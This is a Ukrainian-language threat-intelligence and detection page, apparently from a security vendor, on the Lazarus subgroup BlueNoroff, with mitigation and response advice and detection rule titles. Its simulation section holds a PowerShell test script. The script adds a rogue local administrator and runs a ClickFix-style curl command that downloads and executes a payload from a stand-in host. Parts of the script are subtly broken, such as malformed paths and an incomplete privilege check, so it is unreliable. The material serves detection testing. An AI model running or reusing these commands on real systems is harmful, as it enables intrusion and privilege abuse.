Група BlueNoroff: Фінансовий кіберзлочинний підрозділ Lazarus
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
BlueNoroff — це фінансово вмотивована підгрупа в екосистемі Lazarus, яка зосереджується на операціях з високою цінністю проти банків, криптовалютних фірм і ширших цілей Web3. Книга гри групи охоплює шахрайство з використанням SWIFT, компрометацію водопоїв, отруєння постачальницького ланцюжка пакетів Go і шляхи вторгнення в macOS, що базуються на фейкових приманках “співбесіда на роботу”. Для досягнення виконання і заводу BlueNoroff змішує модульний стек шкідливих програм Rust/Go з AppleScript, VBScript і соціально-інженерськими робочими процесами, розробленими для обходу обережності користувачів та інтеграції в легітимну діяльність розробки та адміністрування.
Розслідування
Звіт відстежує траєкторію BlueNoroff від пограбування банку в Бангладеш у 2016 році до більш недавніх активностей у постачальницькому ланцюзі 2025 року, підкреслюючи, як інструменти та цілі актора розширювалися разом з екосистемою криптовалют/Web3. Дослідники окреслюють інфраструктурні шаблони та каталогізують компоненти шкідливих програм, включаючи GhostCall, GhostHire, RustBucket і GillyInjector. Розслідування також картиє спостережувані поведінки на MITRE ATT&CK через такі стадії, як розвідка та початковий доступ, а потім виконання, заповзятість і викрадення облікових даних, підкреслюючи постійний акцент на скритних опорах, поетапній доставці корисного навантаження та шляхах доступу, готових до крадіжки.
Пом’якшення
Зменшіть вплив, посиливши гігієну постачальницького ланцюга: перевіряйте пакунки, отримані з публічних реєстрів, впроваджуйте контроль прив’язки і походження, і постійно переглядайте оновлення залежностей на несподівані зміни в підтримувачі або коді. На macOS підсилити управління LaunchAgent/LaunchDaemon та стежте за підозрілими записами стійкості та непідписаними інструментами. Блокуйте домени, схожі на приманку, впроваджуйте MFA для привілейованих особистостей та зовнішніх сервісів, і операціоналізуйте виявлення відомих шкідливих скриптів, завантажувачів і технік запаковки, пов’язаних з актором. Підтримуйте часті оновлення розвідки загроз і зміцнюйте навчання користувачів, зосереджене на фішингу і соціально-інженерних шаблонах “рекрутер/співбесіда на роботу”.
Реакція
Якщо виявлено індикатори BlueNoroff, ізолюйте уражені хости та збережіть ключові докази, включаючи повні командні рядки, вміст скриптів і спущені бінарні файли або артефакти пакунків. Блокуйте виявлені шкідливі домени та C2 IPs, тоді виконайте сценарії реагування на інциденти, пов’язані з викраденням облікових даних і компрометацією постачальницького ланцюга. Розгорніть чи налаштуйте виявлення для ланцюжків виконання AppleScript і VBScript, а також для підозрілих шаблонів PowerShell, зазначених у звітах, тоді розширте полювання, щоб визначити додаткові кінцеві точки, вплив яких був викликаний тією ж приманкою, залежністю або перекриттям інфраструктури.
Атака Flow
Виявлення
Можливе виявлення конфігурації мережі системи (через cmdline)
Переглянути
Можливе виявлення віддаленої системи або перевірка підключення (через cmdline)
Переглянути
Підозрілі бінарні файли / скрипти в локації автозапуску (через file_event)
Переглянути
Можливе перерахування адміністраторських акаунтів або груп (через cmdline)
Переглянути
IOCs (Електронні листи) для виявлення: група BlueNoroff: фінансове кіберзлочинне крило Lazarus
Переглянути
Виявлення шкідливого виконання AppleScript і команди ClickFix [Створення процесу Windows]
Переглянути
Перелік локальних і доменних користувачів через Net-команди [Windows Sysmon]
Переглянути
Виявлення обфускації та кодування BlueNoroff PowerShell [Windows PowerShell]
Переглянути
Виконання симуляції
Передумова: передпольотна перевірка телеметрії та базових умов має бути пройдена.
Мотив: у цьому розділі детально описано точне виконання техніки супротивника (TTP), призначене для активації правила виявлення. Команди і наратив повинні безпосередньо відображати визначені TTPs та спрямовані на створення тієї самої телеметрії, що очікується логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильної діагностики.
-
Опис атаки та команди:
- Виконання AppleScript (T1546.016) – Противник скидає шкідливий
payload.scptна кінцеву точку (наприклад, через фішингове вкладення). Використовуючи попередньо встановленийosascript.exe(упакований з інструментом третьої сторони), вони запускають скрипт для виконання завантажувача PowerShell, що додає новий локальний обліковий запис адміністратора. - Доставлення ClickFix через буфер обміну (T1204.004) – Атакуючий копіює створену команду у буфер обміну, що викликає
curlз користувацьким агентом в стилі Zoom для завантаження другого етапу корисного навантаження, а потім негайно виконує його черезcmd.exe. Команда включає також вбудованийpowershell.exe -cвиклик для виконання корисного навантаження в пам’яті.
- Виконання AppleScript (T1546.016) – Противник скидає шкідливий
-
Сценарій регресійного тестування: Сценарій нижче відтворює обидві поведінки в детермінований спосіб.
#----- ПОЧАТОК СЦЕНАРІЮ ТЕСТУ НА РЕГРЕСІЮ ----- # Переконайтеся, що ми працюємо з адміністративними привілеями if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Запустіть цей скрипт як Адміністратор." exit 1 } # 1. Виконання AppleScript через osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Виконання AppleScript Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. Доставлення стилю ClickFix через буфер обміну $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Запуск через cmd.exe відповідно до умов правила Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Очистити: видалити артефакти Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Кінець скрипту #----- КІНЕЦЬ СЦЕНАРІЮ ТЕСТУ НА РЕГРЕСІЮ ----- -
Команди очищення: Видаліть всі залишкові процеси, файли та обліковий запис тестування користувача.
# Зупинити всі залишкові процеси (оборонна дія – зазвичай не потрібна) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалити тимчасові файли Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Видалити тестовий обліковий запис адміністратора, якщо він був створений if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }